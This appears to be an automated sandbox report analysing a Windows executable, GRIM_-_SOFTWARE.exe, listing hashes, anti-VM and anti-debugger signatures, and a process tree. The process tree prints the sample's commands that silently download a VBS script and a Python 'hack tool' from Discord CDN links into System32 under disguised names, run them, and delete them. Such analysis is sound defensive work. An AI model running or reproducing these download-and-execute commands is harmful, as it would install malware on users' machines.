Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
25-03-2023 22:51
Behavioral task
behavioral1
Sample
GRIM_-_SOFTWARE.exe
Resource
win7-20230220-en
General
-
Target
GRIM_-_SOFTWARE.exe
-
Size
3.8MB
-
MD5
6d7e1336a7185a2049c09429cc980b75
-
SHA1
fd2de69db4416363fb6e34b42e0510256e0e28aa
-
SHA256
01324ea7cc70df8163a950920606ec33375dd911b5297bf6d204939d19a1ffcb
-
SHA512
88cf6bfc2deb543e0644100c7a3d547bd18a1e05715a4554d7c45a21a608bbf8821e0427630de9298197477dd5df2317c2c5c2aa01c1cbfe3a7b5531f91547e0
-
SSDEEP
98304:s/dtvQLaLimy/whXcohnwA3wPiee6R8dqFedrh1NqYQ8wUkdqz54v8mY:gdt8my/ysoBDAPiURzenxuc4k1
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
GRIM_-_SOFTWARE.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GRIM_-_SOFTWARE.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
GRIM_-_SOFTWARE.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GRIM_-_SOFTWARE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GRIM_-_SOFTWARE.exe -
Processes:
resource yara_rule behavioral1/memory/2012-54-0x000000013F020000-0x000000013FA17000-memory.dmp themida behavioral1/memory/2012-55-0x000000013F020000-0x000000013FA17000-memory.dmp themida behavioral1/memory/2012-56-0x000000013F020000-0x000000013FA17000-memory.dmp themida behavioral1/memory/2012-57-0x000000013F020000-0x000000013FA17000-memory.dmp themida behavioral1/memory/2012-58-0x000000013F020000-0x000000013FA17000-memory.dmp themida behavioral1/memory/2012-89-0x000000013F020000-0x000000013FA17000-memory.dmp themida behavioral1/memory/2012-90-0x000000013F020000-0x000000013FA17000-memory.dmp themida behavioral1/memory/2012-94-0x000000013F020000-0x000000013FA17000-memory.dmp themida behavioral1/memory/2012-97-0x000000013F020000-0x000000013FA17000-memory.dmp themida -
Processes:
GRIM_-_SOFTWARE.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GRIM_-_SOFTWARE.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
GRIM_-_SOFTWARE.exepid process 2012 GRIM_-_SOFTWARE.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
GRIM_-_SOFTWARE.execmd.exedescription pid process target process PID 2012 wrote to memory of 1972 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1972 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1972 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1792 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1792 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1792 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1708 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1708 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1708 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 628 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 628 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 628 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1780 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1780 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1780 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1648 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1648 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1648 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 772 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 772 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 772 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 772 wrote to memory of 1372 772 cmd.exe certutil.exe PID 772 wrote to memory of 1372 772 cmd.exe certutil.exe PID 772 wrote to memory of 1372 772 cmd.exe certutil.exe PID 772 wrote to memory of 876 772 cmd.exe find.exe PID 772 wrote to memory of 876 772 cmd.exe find.exe PID 772 wrote to memory of 876 772 cmd.exe find.exe PID 772 wrote to memory of 1536 772 cmd.exe find.exe PID 772 wrote to memory of 1536 772 cmd.exe find.exe PID 772 wrote to memory of 1536 772 cmd.exe find.exe PID 2012 wrote to memory of 1368 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1368 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1368 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1432 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1432 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1432 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1860 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1860 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1860 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1896 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1896 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1896 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1400 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1400 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1400 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1944 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1944 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1944 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1952 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1952 2012 GRIM_-_SOFTWARE.exe cmd.exe PID 2012 wrote to memory of 1952 2012 GRIM_-_SOFTWARE.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe"C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1083836125409447966/me.vbs --output C:/Windows/System32/prnmngrs.vbs2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/882707027791605791/1089311596381220945/Fortnite_hack_toolv2.py --output C:/Windows/System32/IME/SHARED/IMESEARCHING.py >nul 2>&12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:/Windows/System32/prnmngrs.vbs C:/Windows/System32/IME/SHARED/IMESEARCHING.py2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe" MD53⤵
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1079159361764602037/Welcome.mp3 --output C:/Windows/System32/Windows_FIEO.mp3 >nul 2>&12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\System32\Windows_FIEO.mp32⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:/Windows/System32/prnmngrs.vbs2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:/Windows/System32/IME/SHARED/IMESEARCHING.py2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1708-88-0x0000000001F50000-0x0000000001F51000-memory.dmpFilesize
4KB
-
memory/2012-54-0x000000013F020000-0x000000013FA17000-memory.dmpFilesize
10.0MB
-
memory/2012-55-0x000000013F020000-0x000000013FA17000-memory.dmpFilesize
10.0MB
-
memory/2012-56-0x000000013F020000-0x000000013FA17000-memory.dmpFilesize
10.0MB
-
memory/2012-57-0x000000013F020000-0x000000013FA17000-memory.dmpFilesize
10.0MB
-
memory/2012-58-0x000000013F020000-0x000000013FA17000-memory.dmpFilesize
10.0MB
-
memory/2012-89-0x000000013F020000-0x000000013FA17000-memory.dmpFilesize
10.0MB
-
memory/2012-90-0x000000013F020000-0x000000013FA17000-memory.dmpFilesize
10.0MB
-
memory/2012-94-0x000000013F020000-0x000000013FA17000-memory.dmpFilesize
10.0MB
-
memory/2012-97-0x000000013F020000-0x000000013FA17000-memory.dmpFilesize
10.0MB